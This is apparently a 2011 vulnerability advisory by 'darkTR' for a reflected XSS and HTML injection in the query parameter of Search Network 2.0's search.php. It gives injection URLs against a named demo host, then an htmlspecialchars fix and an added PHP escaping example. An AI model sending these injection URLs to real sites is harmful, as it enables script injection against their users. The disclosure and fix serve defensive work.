##############################################################
[#] Script Name        : Search Network 2.0
[#] Vulnerability Type : XSS Vulnerability
[#] Author             : darkTR
[#] Date               : 03.08.2011
[#] E-mail             : darkTR@hotmail.com
[#] Target             : search.php?action=search_results&query=[XSS]
[#] Demo               : http://developer.searchnetworkhq.com/demo/search.php?
#############################################################

Exploits :

HTML INJECTION
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=“>darkTR<%2Fmarquee>

XSS
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]

Fixing the vulnerability :

We can close the hole by using htmlspecialchars. Open the index.php file and find:

    $result = file_get_contents($url);

We should change this part as follows:

    $result = htmlspecialchars(file_get_contents($url));

After the fix, characters such as ">,<" will be converted to HTML entities and the vulnerability will be eliminated.

darkTR | Code Hunters TIM
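
The htmlspecialchars fix above, worked through as an added example (not code from the advisory or from Search Network): it escapes the query value at the point where it is written into the page, with explicit flags and charset. The function names, the sample input and the way search.php echoes the parameter are assumptions.

```php
<?php
// Added example, not Search Network's code. query_param(), h() and the
// render_* functions are hypothetical stand-ins for wherever search.php
// reads the `query` parameter and writes it back into the page.

// Read the parameter defensively: ?query[]=x turns $_GET['query'] into an array.
function query_param(array $get): string
{
    $q = $get['query'] ?? '';
    return is_string($q) ? $q : '';
}

// Escape for HTML text and quoted attribute values. Flags and charset are
// explicit because before PHP 8.1 the default (ENT_COMPAT) leaves ' untouched.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: the raw parameter lands in the markup, so < > " ' are live HTML.
function render_heading_unsafe(string $query): string
{
    return '<h2>Results for ' . $query . '</h2>';
}

// After, text context.
function render_heading(string $query): string
{
    return '<h2>Results for ' . h($query) . '</h2>';
}

// After, attribute context: the value is always quoted, so an escaped
// quote inside it cannot terminate the attribute.
function render_search_box(string $query): string
{
    return '<input type="text" name="query" value="' . h($query) . '">';
}

// Constructed request data containing every character htmlspecialchars rewrites.
$get = ['action' => 'search_results', 'query' => 'it\'s "quoted" <b>bold</b> & more'];
$query = query_param($get);

echo render_heading_unsafe($query), "\n";
echo render_heading($query), "\n";
echo render_search_box($query), "\n";
```

Escape once, at output, for the context the value lands in; escaping a value when it is stored or fetched and again when it is printed double-encodes it.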